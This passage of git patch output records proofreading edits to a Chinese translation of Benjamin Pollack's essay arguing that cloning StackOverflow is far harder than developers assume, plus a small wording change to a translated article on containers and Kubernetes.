功能?如果只去实现提问和回答问题的功能?这个部分应该很简单吧。其实不然,因为实现问和答的功能还要求你必须做出一个对问题和其答案的投票系统,来显示大家对某个答案是赞同还是反对。因为只有这样你才能保证提问者可以得到这个问题的唯一的可信答案。当然,你还不能让人们赞同或者反对他们自己给出的答案,所以你还要去实现这种禁止自投自票的机制。除此之外,你需要去确保用户在一定的时间内不能赞同或反对其他用户太多次,以此来防止有人用机器人程序作弊乱投票。你很可能还需要去实现一个垃圾评论过滤器,即使这个过滤器很基础很简陋,你也要考虑如何去设计它。而且你恐怕还需要去支持用户图标(头像)的功能。并且你将不得不寻找一个自己真正信任的并且 +与 Markdown 接合很好的干净的 HTML 库(当然,假设你确实想要复用 StackOverflow 的 [那个超棒的编辑器][11] )。你还需要为所有控件购买或者设计一些小图标小部件,此外你至少需要实现一个基本的管理界面,以便那些喜欢捣鼓的用户可以调整和改动他们的个性化设置。并且你需要实现类似于 Karma 的声望累积系统,以便用户可以随着不断地使用来稳步提升他们的话语权和解锁更多的功能以及可操作性。 -但是如果你实现了以上所有功能,可以说你就已经把要做的都做完了。 +但是如果你实现了以上_所有_功能,可以说你_就已经_把要做的都做完了。 除非...除非你还要做全文检索功能。尤其是在“边问边搜”(动态检索)的特性中,支持全文检索是必不可少的。此外,录入和显示用户的基本信息,实现对问题答案的评论功能,以及实现一个显示热点提问的页面,以及热点问题和帖子随着时间推移沉下去的这些功能,都将是不可或缺的。另外你肯定还需要去实现回答奖励系统,并支持每个用户用多个不同的 OpenID 账户去登录,然后将这些相关的登陆事件通过邮件发送出去来通知用户,并添加一个标签或徽章系统,接着允许管理员通过一个不错的图形界面来配置这些标签和徽章(Badge)。你需要去显示用户的 Karma 历史,以及他们的历史点赞和差评。而且整个页面还需要很流畅的展开和拉伸,因为这个系统的页面随时都可能被 Slashdot,Reddit 或是 StackOverflow 这些动作影响到。 @@ -28,9 +29,9 @@ 那么请你告诉我:如果你要做一个让人满意的类似产品出来,上述的哪一个功能是你可以省略掉的呢?哪些是“大部分”网站都具备的功能,哪些又不是呢? -正因为这些很容易被忽视的问题,开发者才会以为做一个 StackOverflow 的仿制版产品会很简单。也同样是因为这些被忽视了的因素,开源软件才一直让人用起来很痛苦。很多软件开发人员在看到 StackOverflow 的时候,他们并不能察觉到 StackOverflow 产品的全貌。他们会简单的把 Stackoverflow 的实现抽象成下面一段逻辑和代码 +正因为这些很容易被忽视的问题,开发者才会以为做一个 StackOverflow 的仿制版产品会很简单。也同样是因为这些被忽视了的因素,开源软件才一直让人用起来很痛苦。很多软件开发人员在看到 StackOverflow 的时候,他们并不能察觉到 StackOverflow 产品的全貌。他们会简单的把 Stackoverflow 的实现抽象成下面一段逻辑和代码: -```SQL +``` create table QUESTION (ID identity primary key, TITLE varchar(255), --- 为什么我知道你认为是 255 BODY text, @@ -42,12 +43,11 @@ create table RESPONSE (ID identity primary key, UPVOTES integer not null default 0, DOWNVOTES integer not null default 0, QUESTION integer references QUESTION(ID)) - ``` 如果你让这些开发者去实现 StackOverflow,进入他脑海中的就是上面的两个 SQL 表和一个用以呈现表格数据的 HTML 文件。他们甚至会忽略数据的格式问题,进而单纯的以为他们可以在一个周末的时间里就把 StackOverflow 做出来。一些稍微老练的开发者可能会意识到他们还要去实现登陆和注销功能,评论功能,投票系统,但是仍然会自信的认为这不过也就是利用一个周末就能完成了;因为这些功能也不过意味着在后端多了几张 SQL 表和 HTML 文件。如果借助于 Django 之类的构架和工具,他们甚至可以直接拿来主义地不花一分钱就实现用户登陆和评论的功能。 -但这种简单的实现却远远不能体现出 StackOverflow 的精髓。无论你对 StackOverflow 的感觉如何,大多数使用者似乎都同意 StackOverflow 的用户体验从头到尾都很流畅。使用 StackOverflow 的过程就是在跟一个精心打磨过的产品在愉快地交互。即使我没有深入了解过 StackOverflow ,我也能猜测出这个产品的成功和它数据库的 Schema 没有多大关系 - 实际上在有幸研读过 StackOverflow 的源码之后,我得以印证了自己的想法,StackOverflow 的成功确实和它的数据库设计关系甚小。真正让它成为一个极其易用的网站的原因,是它背后各种精雕细琢的设计和实施。多数的开发人员在谈及仿制和克隆一款产品的难度时,真的很少会去考虑到产品背后的打磨和雕琢工作,因为他们认为这些打磨和雕琢都是偶然的,甚至是无足轻重的。 +但这种简单的实现却_远远不能_体现出 StackOverflow 的精髓。无论你对 StackOverflow 的感觉如何,大多数使用者似乎都同意 StackOverflow 的用户体验从头到尾都很流畅。使用 StackOverflow 的过程就是在跟一个精心打磨过的产品在愉快地交互。即使我没有深入了解过 StackOverflow ,我也能猜测出这个产品的成功和它数据库的 Schema 没有多大关系 - 实际上在有幸研读过 StackOverflow 的源码之后,我得以印证了自己的想法,StackOverflow 的成功确实和它的数据库设计关系甚小。真正让它成为一个极其易用的网站的原因,是它背后_大量的_精雕细琢的设计和实施。多数的开发人员在谈及仿制和克隆一款产品的难度时,真的_很少会去考虑到产品背后的打磨和雕琢工作_,因为他们认为_这些打磨和雕琢都是偶然的,甚至是无足轻重的。_ 这就是为什么用开源工具去克隆和山寨 StackOverflow 其实是很容易失败的。即使这些开源开发者只是想去实现 StackOverflow 的主要的“规范和标准特性”,而非全面的高级特性,他们也会在实现的过程中遭遇种种关键和核心的问题,让他们阴沟翻船,半途而废。拿 Badge (徽章功能)来说,如果你要针对普通终端用户来设计 Badge , 则要么需要实现一个用户可用来个性化设置 bagdge 的 GUI,要么则取巧的设计出一个比较通用的 Badge 供所有的安装版本来使用。而开源设计的实际情况是,开发者会有很多的抱怨和牢骚,认为给 Badge 这种东西设计一个功能全面的 GUI 是根本不肯能的。而且他们会固执地把任何标准 badge 的提案踢回去,踢出第一宇宙速度,击穿地壳甩到地球的另一端。最终这些开发者还是会搞出一个类似于 Roundup 的 bug tracker 程序都在使用的流程和方案:即实现一个通用的机制, 提供以 Python 或 Php 为基础的一些系统API, 以便那些可以自如使用 Python 或 Php 的人可以轻松的通过这些编程接口来定制化他们自己的 Badge。而且老实说,PHP 和 Python 可是比任何可能的 GUI 接口都要好用和强大得多,为什么还要考虑 GUI 的方案呢?(出自开源开发者的想法) @@ -56,8 +56,8 @@ create table RESPONSE (ID identity primary key, 开发者可能不会关心一个应用的上述设计细节,但是终端用户一定会。尤其是当他们在尝试去选择要使用哪个应用的时候,这些终端用户更会重视这些接口设计是否易用。就好像一家好的软件公司希望通过确保其产品在出货之前就有一流的质量,以降低售后维护支持的成本一样,懂行的消费者也会在他们购买这些产品之前就确保产品好用,以防在使用的时候不知所措,然后无奈的打电话给售后来解决问题。开源产品就失败在这里,而且相当之失败。一般来讲,付费软件则在这方面做得好很多。 -这不是说开源软件没有自己的立足之地,这个博客就运行在 Apache,Django,PostgreSQL 和 Linux 搭建的开源系统之上。但是让我来告诉你吧,配置这些堆栈可不是谁都可以做的。老版本的 PostgreSQL 需要手工配置 Vacuuming 来确保数据库的自动清理,而即使是最新版本的 ubuntu 和 FreeBSD 也仍然要求用户去手工配置他们的第一个数据库集群。 -相比之下,MS SQL (微软的 SQL) 则不需要你手工配置以上的任何一样东西。至于 Apache ... 我的天,Apache 简直复杂到让我根本来不及去尝试给一个新用户讲解我们如何可以通过一个一次性的安装过程就能把虚拟机,MovableType,几个 Diango apps 和 WordPress 配置在一起并流畅地使用。单单是给那些技术背景还不错但并非软件开发者的用户解释清楚 Apache 的那些针对多进程和多线程的设置参数就已经够我喝一壶的了。相比之下,微软的 IIS 7 或者是使用了 OS X 服务器的那个几乎闭源的 GUI 管理器的 Apache ,在配置的时候就要简单上不止一个数量级了。Django 确实是一个好的开源产品,但它也只是一个基础构架,而并非是一个可以直接面向终端普通用户的商业产品。而开源真正的强项就恰恰在这种基础构架的开发和创新上,这也正是驱使开发者为开源做贡献的最本真的动力。 +这不是说开源软件没有自己的立足之地,这个博客就运行在 Apache,[Django][12],[PostgreSQL][13] 和 Linux 搭建的开源系统之上。但是让我来告诉你吧,配置这些堆栈可不是谁都可以做的。老版本的 PostgreSQL 需要手工配置 Vacuuming 来确保数据库的自动清理,而即使是最新版本的 ubuntu 和 FreeBSD 也仍然要求用户去手工配置他们的第一个数据库集群。 +相比之下,MS SQL (微软的 SQL) 则不需要你手工配置以上的任何一样东西。至于 Apache ... 我的天,Apache 简直复杂到让我根本来不及去尝试给一个新用户讲解我们如何可以通过一个一次性的安装过程就能把虚拟机,MovableType,几个 Diango apps 和 WordPress 配置在一起并流畅地使用。单单是给那些技术背景还不错但并非软件开发者的用户解释清楚 Apache 的那些针对多进程和多线程的设置参数就已经够我喝一壶的了。相比之下,微软的 IIS 7 或者是使用了 OS X 服务器的那个几乎闭源的 GUI 管理器的 Apache ,在配置的时候就要简单上不止一个数量级了。Django 确实是一个好的开源产品,但它也 _只是_ 一个基础构架,而并非是一个可以直接面向终端普通用户的商业产品。而开源真正的强项就 _恰恰在_ 这种基础构架的开发和创新上,这也正是驱使开发者为开源做贡献的最本真的动力。 所以我的结论是,如果下次你再看到一个你喜欢的应用程序,请好好细心地揣摩一下这款产品,揣摩一下所有的那些针对用户的体贴入微的设计细节。而不是武断的认为你可以轻轻松松的再一周之内就用开源工具做一个和这个应用一摸一样的产品出来。那些认为制作和实现一个应用程序如此简单的人,十之八九都是因为忽略了软件开发的最终产品是要交给用户去用的。 @@ -66,6 +66,24 @@ create table RESPONSE (ID identity primary key, via: https://bitquabit.com/post/one-which-i-call-out-hacker-news/ -作者:Benjamin Pollack 译者:hopefully2333 校对:yunfengHe +作者:[Benjamin Pollack][a] +译者:[hopefully2333](https://github.com/hopefully2333) +校对:[yunfengHe](https://github.com/yunfengHe) -本文由 LCTT 原创编译,Linux中国 荣誉推出 +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://bitquabit.com/meta/about/ +[1]:http://www.cs.duke.edu/~ola/ +[2]:http://www.cs.duke.edu/courses/cps108/spring04/ +[3]:https://bitquabit.com/categories/programming +[4]:https://bitquabit.com/categories/technology +[5]:http://blog.bitquabit.com/2009/06/30/one-which-i-say-open-source-software-sucks/ +[6]:http://news.ycombinator.com/item?id=678501 +[7]:http://news.ycombinator.com/item?id=678704 +[8]:http://code.google.com/p/cnprog/ +[9]:http://code.google.com/p/soclone/ +[10]:http://en.wikipedia.org/wiki/Words_per_minute +[11]:http://github.com/derobins/wmd/tree/master +[12]:http://www.djangoproject.com/ +[13]:http://www.postgresql.org/ +[14]:https://bitquabit.com/post/one-which-i-call-out-hacker-news/ From a087cb7989836329fe4a0d69e38743d0ec8c84f7 Mon Sep 17 00:00:00 2001 From: yunfengHe Date: Fri, 15 Dec 2017 20:13:52 +0800 Subject: [PATCH 0593/1627] =?UTF-8?q?=E6=9C=80=E7=BB=88=E6=A0=A1=E5=AF=B9?= =?UTF-8?q?=E5=AE=8C=E6=AF=95?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../tech/20090701 The One in Which I Call Out Hacker News.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/translated/tech/20090701 The One in Which I Call Out Hacker News.md b/translated/tech/20090701 The One in Which I Call Out Hacker News.md index 67b4c2ea96..0b06d3259a 100644 --- a/translated/tech/20090701 The One in Which I Call Out Hacker News.md +++ b/translated/tech/20090701 The One in Which I Call Out Hacker News.md @@ -1,4 +1,4 @@ -# [因为这个,我找 Hacker News 期刊理论了一番][14] +# [因为这个我要点名批评 Hacker News ][14] > “实现高速缓存会花费 30 个小时,你有额外的 30 个小时吗? From 73d807724ecbbd9623650bc8d12878cf066550e7 Mon Sep 17 00:00:00 2001 From: yunfengHe Date: Fri, 15 Dec 2017 20:55:04 +0800 Subject: [PATCH 0594/1627] =?UTF-8?q?Containers=20and=20Kubernetes=20whats?= =?UTF-8?q?=20next=20=E7=BF=BB=E8=AF=91=E5=AE=8C=E6=AF=95?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...The One in Which I Call Out Hacker News.md | 89 ------------------- ...20 Containers and Kubernetes Whats next.md | 2 +- 2 files changed, 1 insertion(+), 90 deletions(-) delete mode 100644 translated/tech/20090701 The One in Which I Call Out Hacker News.md diff --git a/translated/tech/20090701 The One in Which I Call Out Hacker News.md b/translated/tech/20090701 The One in Which I Call Out Hacker News.md deleted file mode 100644 index 0b06d3259a..0000000000 --- a/translated/tech/20090701 The One in Which I Call Out Hacker News.md +++ /dev/null @@ -1,89 +0,0 @@ -# [因为这个我要点名批评 Hacker News ][14] - - -> “实现高速缓存会花费 30 个小时,你有额外的 30 个小时吗? -不,你没有。我实际上并不知道它会花多少时间,可能它会花五分钟,你有五分钟吗?不,你还是没有。为什么?因为我在撒谎。它会消耗远超五分钟的时间。这一切把问题简单化的假设都只不过是程序员单方面的乐观主义。” -> -> — 出自 [Owen Astrachan][1] 教授于 2004 年 2 月 23 日在 [CPS 108][2] 上的讲座 - -[指责开源软件总是离奇难用已经不是一个新论点了][5]; 这样的论点之前就被很多比我更为雄辩的人提及过, 甚至是出自一些人非常推崇开源软件的人士口中。那么为什么我要在这里老调重弹呢? - -在周一的 Hacker News 期刊上,一段文章把我逗乐了。文章谈到,一些人认为 [编写代码实现和一个跟 StackOverflow 一样的系统可以简单到爆][6],并自信的 [声称他们可以在7月4号的周末就写出一版和 StackOverflow 原版一摸一样的程序][7],以此来证明这一切是多么容易。另一些人则插话说,[现有的][8][那些仿制产品][9] 就已经是一个很好的例证了。 - -秉承着自由讨论的精神,我们来假设一个场景。你在思考了一阵之后认为你可以用 ASP.NET MVC 来编写一套你自己的 StackOverflow 。我呢,在被一块儿摇晃着的怀表催眠之后,脑袋又挨了别人一顿棒槌,然后像个二哈一样一页一页的把 StackOverflow 的源码递给你,让你照原样重新拿键盘逐字逐句的在你的环境下把那些代码再敲一遍,做成你的 StackOverflow。假设你可以向我一样打字飞快,一分钟能敲100个词 ([也就是大约每秒敲八个字母][10]),但是却可以牛叉到我无法企及的打字零错误率。从 StackOverflow 的大小共计2.3MB的源码来估计(包括.CS, .SQL, .CSS, .JS 和 .aspx文件),就单单是照着源代码这么飞速敲一遍而且一气呵成中间一个字母都不错,你也要差不多用掉至少 80 个小时的时间。 - -或者你打算从零开始编码实现你自己的 StackOverflow,虽然我知道你肯定是不会那样做的。我们假设你从设计程序,到敲代码,再到最终完成调试只需要区区十倍于抄袭 StackOverflow 源代码的时间。即使在这样的假设条件下,你也要耗费几周的时间昼夜不停得狂写代码。不知道你是否愿意,但是至少我可以欣然承认,如果只给我照抄源 StackOverflow 代码用时的十倍时间来让我自己写 StackOverflow, 我可是打死也做不到。 - -_好的_,我知道你在听到这些假设的时候已经开始觉得泄气了。*你在想,如果不是全部实现,而只是实现 StackOverflow **大部分** 的功能呢?这总归会容易很多了吧。* - -好的,问题是什么是 "大部分" 功能?如果只去实现提问和回答问题的功能?这个部分应该很简单吧。其实不然,因为实现问和答的功能还要求你必须做出一个对问题和其答案的投票系统,来显示大家对某个答案是赞同还是反对。因为只有这样你才能保证提问者可以得到这个问题的唯一的可信答案。当然,你还不能让人们赞同或者反对他们自己给出的答案,所以你还要去实现这种禁止自投自票的机制。除此之外,你需要去确保用户在一定的时间内不能赞同或反对其他用户太多次,以此来防止有人用机器人程序作弊乱投票。你很可能还需要去实现一个垃圾评论过滤器,即使这个过滤器很基础很简陋,你也要考虑如何去设计它。而且你恐怕还需要去支持用户图标(头像)的功能。并且你将不得不寻找一个自己真正信任的并且 -与 Markdown 接合很好的干净的 HTML 库(当然,假设你确实想要复用 StackOverflow 的 [那个超棒的编辑器][11] )。你还需要为所有控件购买或者设计一些小图标小部件,此外你至少需要实现一个基本的管理界面,以便那些喜欢捣鼓的用户可以调整和改动他们的个性化设置。并且你需要实现类似于 Karma 的声望累积系统,以便用户可以随着不断地使用来稳步提升他们的话语权和解锁更多的功能以及可操作性。 - -但是如果你实现了以上_所有_功能,可以说你_就已经_把要做的都做完了。 - -除非...除非你还要做全文检索功能。尤其是在“边问边搜”(动态检索)的特性中,支持全文检索是必不可少的。此外,录入和显示用户的基本信息,实现对问题答案的评论功能,以及实现一个显示热点提问的页面,以及热点问题和帖子随着时间推移沉下去的这些功能,都将是不可或缺的。另外你肯定还需要去实现回答奖励系统,并支持每个用户用多个不同的 OpenID 账户去登录,然后将这些相关的登陆事件通过邮件发送出去来通知用户,并添加一个标签或徽章系统,接着允许管理员通过一个不错的图形界面来配置这些标签和徽章(Badge)。你需要去显示用户的 Karma 历史,以及他们的历史点赞和差评。而且整个页面还需要很流畅的展开和拉伸,因为这个系统的页面随时都可能被 Slashdot,Reddit 或是 StackOverflow 这些动作影响到。 - -在这之后!你会以为你基本已经大功告成了! - -...为了产品的完整性,在上面所述的工作都完成之后,你又奋不顾身的去实现了升级功能,界面语言的国际化,Karma 值上限,以及让网站更专业的 CSS 设计,AJAX,还有那些看起来理所当然做起来却让人吐血的功能和特性。如果你不是真的动手来尝试做一个和 StackOverflow 一摸一样的系统,你肯定不会意识到在整个程序设计实施的过程中,你会踩到无数的鬼才会知道的大坑。 - -那么请你告诉我:如果你要做一个让人满意的类似产品出来,上述的哪一个功能是你可以省略掉的呢?哪些是“大部分”网站都具备的功能,哪些又不是呢? - -正因为这些很容易被忽视的问题,开发者才会以为做一个 StackOverflow 的仿制版产品会很简单。也同样是因为这些被忽视了的因素,开源软件才一直让人用起来很痛苦。很多软件开发人员在看到 StackOverflow 的时候,他们并不能察觉到 StackOverflow 产品的全貌。他们会简单的把 Stackoverflow 的实现抽象成下面一段逻辑和代码: - -``` -create table QUESTION (ID identity primary key, - TITLE varchar(255), --- 为什么我知道你认为是 255 - BODY text, - UPVOTES integer not null default 0, - DOWNVOTES integer not null default 0, - USER integer references USER(ID)); -create table RESPONSE (ID identity primary key, - BODY text, - UPVOTES integer not null default 0, - DOWNVOTES integer not null default 0, - QUESTION integer references QUESTION(ID)) -``` - -如果你让这些开发者去实现 StackOverflow,进入他脑海中的就是上面的两个 SQL 表和一个用以呈现表格数据的 HTML 文件。他们甚至会忽略数据的格式问题,进而单纯的以为他们可以在一个周末的时间里就把 StackOverflow 做出来。一些稍微老练的开发者可能会意识到他们还要去实现登陆和注销功能,评论功能,投票系统,但是仍然会自信的认为这不过也就是利用一个周末就能完成了;因为这些功能也不过意味着在后端多了几张 SQL 表和 HTML 文件。如果借助于 Django 之类的构架和工具,他们甚至可以直接拿来主义地不花一分钱就实现用户登陆和评论的功能。 - -但这种简单的实现却_远远不能_体现出 StackOverflow 的精髓。无论你对 StackOverflow 的感觉如何,大多数使用者似乎都同意 StackOverflow 的用户体验从头到尾都很流畅。使用 StackOverflow 的过程就是在跟一个精心打磨过的产品在愉快地交互。即使我没有深入了解过 StackOverflow ,我也能猜测出这个产品的成功和它数据库的 Schema 没有多大关系 - 实际上在有幸研读过 StackOverflow 的源码之后,我得以印证了自己的想法,StackOverflow 的成功确实和它的数据库设计关系甚小。真正让它成为一个极其易用的网站的原因,是它背后_大量的_精雕细琢的设计和实施。多数的开发人员在谈及仿制和克隆一款产品的难度时,真的_很少会去考虑到产品背后的打磨和雕琢工作_,因为他们认为_这些打磨和雕琢都是偶然的,甚至是无足轻重的。_ - -这就是为什么用开源工具去克隆和山寨 StackOverflow 其实是很容易失败的。即使这些开源开发者只是想去实现 StackOverflow 的主要的“规范和标准特性”,而非全面的高级特性,他们也会在实现的过程中遭遇种种关键和核心的问题,让他们阴沟翻船,半途而废。拿 Badge (徽章功能)来说,如果你要针对普通终端用户来设计 Badge , 则要么需要实现一个用户可用来个性化设置 bagdge 的 GUI,要么则取巧的设计出一个比较通用的 Badge 供所有的安装版本来使用。而开源设计的实际情况是,开发者会有很多的抱怨和牢骚,认为给 Badge 这种东西设计一个功能全面的 GUI 是根本不肯能的。而且他们会固执地把任何标准 badge 的提案踢回去,踢出第一宇宙速度,击穿地壳甩到地球的另一端。最终这些开发者还是会搞出一个类似于 Roundup 的 bug tracker 程序都在使用的流程和方案:即实现一个通用的机制, 提供以 Python 或 Php 为基础的一些系统API, 以便那些可以自如使用 Python 或 Php 的人可以轻松的通过这些编程接口来定制化他们自己的 Badge。而且老实说,PHP 和 Python 可是比任何可能的 GUI 接口都要好用和强大得多,为什么还要考虑 GUI 的方案呢?(出自开源开发者的想法) - -同样的,开源开发者会认为那些系统设置和管理员界面也一样可以省略掉。在他们看来,假如你是一个管理员,有 SQL 服务器的权限,那么你就理所当然的具备那些系统管理员该有的知识和技能。那么你其实可以使用 Djang-admin 或者任何类似的工具来轻松的对 StackOverflow 做很多设置和改造工作。毕竟如果你是一个 mods (懂如何mod的人)那么你肯定知道网站是怎么工作的,懂得如何利用专业工具去设置和改造一个网站。对啊!这不就得了! 毋庸置疑,在开源开发者重做他们自己的 StackOverflow 的时候,他们也不会把任何 StackOverflow 在接口上面的失败设计纠正过来。即使是原版 StackOverflow 里面最愚蠢最失败的那个设计(即要求用户必须拥有一个 OpenID 并知道如何使用它)在某个将来最终被 StackOverflow 删除和修正掉了, 我相信正在复制 StackOverflow 模式的那些开源克隆产品也还是会不假思索的把这个 OpenID 的功能仿制出来。这就好比是 GNOME 和 KDE 多年以来一直在做的事情,他们并没有把精力放在如何在设计之初就避免 Windows 的那些显而易见的毛病和问题,相反的确是在亦步亦趋的重复着 Windows 的设计,想办法用开源的方式做出一个比拟 Windows 功能的系统。 - - -开发者可能不会关心一个应用的上述设计细节,但是终端用户一定会。尤其是当他们在尝试去选择要使用哪个应用的时候,这些终端用户更会重视这些接口设计是否易用。就好像一家好的软件公司希望通过确保其产品在出货之前就有一流的质量,以降低售后维护支持的成本一样,懂行的消费者也会在他们购买这些产品之前就确保产品好用,以防在使用的时候不知所措,然后无奈的打电话给售后来解决问题。开源产品就失败在这里,而且相当之失败。一般来讲,付费软件则在这方面做得好很多。 - -这不是说开源软件没有自己的立足之地,这个博客就运行在 Apache,[Django][12],[PostgreSQL][13] 和 Linux 搭建的开源系统之上。但是让我来告诉你吧,配置这些堆栈可不是谁都可以做的。老版本的 PostgreSQL 需要手工配置 Vacuuming 来确保数据库的自动清理,而即使是最新版本的 ubuntu 和 FreeBSD 也仍然要求用户去手工配置他们的第一个数据库集群。 -相比之下,MS SQL (微软的 SQL) 则不需要你手工配置以上的任何一样东西。至于 Apache ... 我的天,Apache 简直复杂到让我根本来不及去尝试给一个新用户讲解我们如何可以通过一个一次性的安装过程就能把虚拟机,MovableType,几个 Diango apps 和 WordPress 配置在一起并流畅地使用。单单是给那些技术背景还不错但并非软件开发者的用户解释清楚 Apache 的那些针对多进程和多线程的设置参数就已经够我喝一壶的了。相比之下,微软的 IIS 7 或者是使用了 OS X 服务器的那个几乎闭源的 GUI 管理器的 Apache ,在配置的时候就要简单上不止一个数量级了。Django 确实是一个好的开源产品,但它也 _只是_ 一个基础构架,而并非是一个可以直接面向终端普通用户的商业产品。而开源真正的强项就 _恰恰在_ 这种基础构架的开发和创新上,这也正是驱使开发者为开源做贡献的最本真的动力。 - - -所以我的结论是,如果下次你再看到一个你喜欢的应用程序,请好好细心地揣摩一下这款产品,揣摩一下所有的那些针对用户的体贴入微的设计细节。而不是武断的认为你可以轻轻松松的再一周之内就用开源工具做一个和这个应用一摸一样的产品出来。那些认为制作和实现一个应用程序如此简单的人,十之八九都是因为忽略了软件开发的最终产品是要交给用户去用的。 - -------------------------------------------------------------------------------- - -via: https://bitquabit.com/post/one-which-i-call-out-hacker-news/ - -作者:[Benjamin Pollack][a] -译者:[hopefully2333](https://github.com/hopefully2333) -校对:[yunfengHe](https://github.com/yunfengHe) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://bitquabit.com/meta/about/ -[1]:http://www.cs.duke.edu/~ola/ -[2]:http://www.cs.duke.edu/courses/cps108/spring04/ -[3]:https://bitquabit.com/categories/programming -[4]:https://bitquabit.com/categories/technology -[5]:http://blog.bitquabit.com/2009/06/30/one-which-i-say-open-source-software-sucks/ -[6]:http://news.ycombinator.com/item?id=678501 -[7]:http://news.ycombinator.com/item?id=678704 -[8]:http://code.google.com/p/cnprog/ -[9]:http://code.google.com/p/soclone/ -[10]:http://en.wikipedia.org/wiki/Words_per_minute -[11]:http://github.com/derobins/wmd/tree/master -[12]:http://www.djangoproject.com/ -[13]:http://www.postgresql.org/ -[14]:https://bitquabit.com/post/one-which-i-call-out-hacker-news/ diff --git a/translated/tech/20171120 Containers and Kubernetes Whats next.md b/translated/tech/20171120 Containers and Kubernetes Whats next.md index 759887dbd2..8e414a95dd 100644 --- a/translated/tech/20171120 Containers and Kubernetes Whats next.md +++ b/translated/tech/20171120 Containers and Kubernetes Whats next.md @@ -4,7 +4,7 @@ ![CIO_Big Data Decisions_2](https://enterprisersproject.com/sites/default/files/styles/620x350/public/images/CIO_Big%20Data%20Decisions_2.png?itok=Y5zMHxf8 "CIO_Big Data Decisions_2") -如果你想对容器在未来的发展方向有一个整体把握,那么你一定要跟着钱走,看看钱都投在了哪里。当然了,有很多很多的钱正在投入容器的进一步发展。相关研究预计 2020 年容器技术的投入将占有 [27 亿美元][4] 的市场份额 。而在 2016 年,容器相关技术投入的总额为 7.62 亿美元,只有 2020 年投入预计的三分之一。巨额投入的背后是一些显而易见的基本因素,包括容器化的迅速增长以及并行化的大趋势。随着容器被大面积推广和使用,容器编排管理也会被理所当然的推广应用起来。 +如果你想对容器在未来的发展方向有一个整体把握,那么你一定要跟着钱走,看看钱都投在了哪里。当然了,有大量的资金正在投入容器的进一步发展。相关研究预计 2020 年容器技术的投入将占有 [27 亿美元][4] 的市场份额 。而在 2016 年,容器相关技术投入的总额为 7.62 亿美元,只有 2020 年投入预计的三分之一。巨额投入的背后是一些显而易见的基本因素,包括容器化的迅速增长以及并行化的大趋势。随着容器被大面积推广和使用,容器编排管理也会被理所当然的推广应用起来。 来自 [_The new stack_][5] 的调研数据表明,容器的推广使用是编排管理被推广的主要的催化剂。根据调研参与者的反馈数据,在已经将容器技术使用到生产环境中的使用者里,有六成正在将 kubernetes(k8s)编排管理广泛的应用在生产环境中,另外百分之十九的人员则表示他们已经处于部署 k8s 的初级阶段。在容器部署初期的使用者当中,虽然只有百分之五的人员表示已经在使用 K8s ,但是百分之五十八的人员表示他们正在计划和准备使用 K8s。总而言之,容器和 Kuebernetes 的关系就好比是鸡和蛋一样,相辅相成紧密关联。众多专家一致认为编排管理工具对容器的[长周期管理][6] 以及其在市场中的发展有至关重要的作用。正如 [Cockroach 实验室][7] 的 Alex Robinson 所说,容器编排管理被更广泛的拓展和应用是一个总体的大趋势。毫无疑问,这是一个正在快速演变的领域,且未来潜力无穷。鉴于此,我们对罗宾逊和其他的一些容器的实际使用和推介者做了采访,来从他们作为容器技术的践行者的视角上展望一下容器编排以及 k8s 的下一步发展。 From f5fe0d8712a68284b7e17c83a84aebbd34e4edde Mon Sep 17 00:00:00 2001 From: yunfengHe Date: Fri, 15 Dec 2017 21:11:36 +0800 Subject: [PATCH 0595/1627] =?UTF-8?q?The=20One=20in=20Which=20I=20call=20o?= =?UTF-8?q?ut=20Hacker=20News=20=E6=A0=A1=E5=AF=B9=E5=AE=8C=E6=AF=95?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...The One in Which I Call Out Hacker News.md | 89 +++++++++++++++++++ ...20 Containers and Kubernetes Whats next.md | 80 ----------------- 2 files changed, 89 insertions(+), 80 deletions(-) create mode 100644 translated/tech/20090701 The One in Which I Call Out Hacker News.md delete mode 100644 translated/tech/20171120 Containers and Kubernetes Whats next.md diff --git a/translated/tech/20090701 The One in Which I Call Out Hacker News.md b/translated/tech/20090701 The One in Which I Call Out Hacker News.md new file mode 100644 index 0000000000..0b06d3259a --- /dev/null +++ b/translated/tech/20090701 The One in Which I Call Out Hacker News.md @@ -0,0 +1,89 @@ +# [因为这个我要点名批评 Hacker News ][14] + + +> “实现高速缓存会花费 30 个小时,你有额外的 30 个小时吗? +不,你没有。我实际上并不知道它会花多少时间,可能它会花五分钟,你有五分钟吗?不,你还是没有。为什么?因为我在撒谎。它会消耗远超五分钟的时间。这一切把问题简单化的假设都只不过是程序员单方面的乐观主义。” +> +> — 出自 [Owen Astrachan][1] 教授于 2004 年 2 月 23 日在 [CPS 108][2] 上的讲座 + +[指责开源软件总是离奇难用已经不是一个新论点了][5]; 这样的论点之前就被很多比我更为雄辩的人提及过, 甚至是出自一些人非常推崇开源软件的人士口中。那么为什么我要在这里老调重弹呢? + +在周一的 Hacker News 期刊上,一段文章把我逗乐了。文章谈到,一些人认为 [编写代码实现和一个跟 StackOverflow 一样的系统可以简单到爆][6],并自信的 [声称他们可以在7月4号的周末就写出一版和 StackOverflow 原版一摸一样的程序][7],以此来证明这一切是多么容易。另一些人则插话说,[现有的][8][那些仿制产品][9] 就已经是一个很好的例证了。 + +秉承着自由讨论的精神,我们来假设一个场景。你在思考了一阵之后认为你可以用 ASP.NET MVC 来编写一套你自己的 StackOverflow 。我呢,在被一块儿摇晃着的怀表催眠之后,脑袋又挨了别人一顿棒槌,然后像个二哈一样一页一页的把 StackOverflow 的源码递给你,让你照原样重新拿键盘逐字逐句的在你的环境下把那些代码再敲一遍,做成你的 StackOverflow。假设你可以向我一样打字飞快,一分钟能敲100个词 ([也就是大约每秒敲八个字母][10]),但是却可以牛叉到我无法企及的打字零错误率。从 StackOverflow 的大小共计2.3MB的源码来估计(包括.CS, .SQL, .CSS, .JS 和 .aspx文件),就单单是照着源代码这么飞速敲一遍而且一气呵成中间一个字母都不错,你也要差不多用掉至少 80 个小时的时间。 + +或者你打算从零开始编码实现你自己的 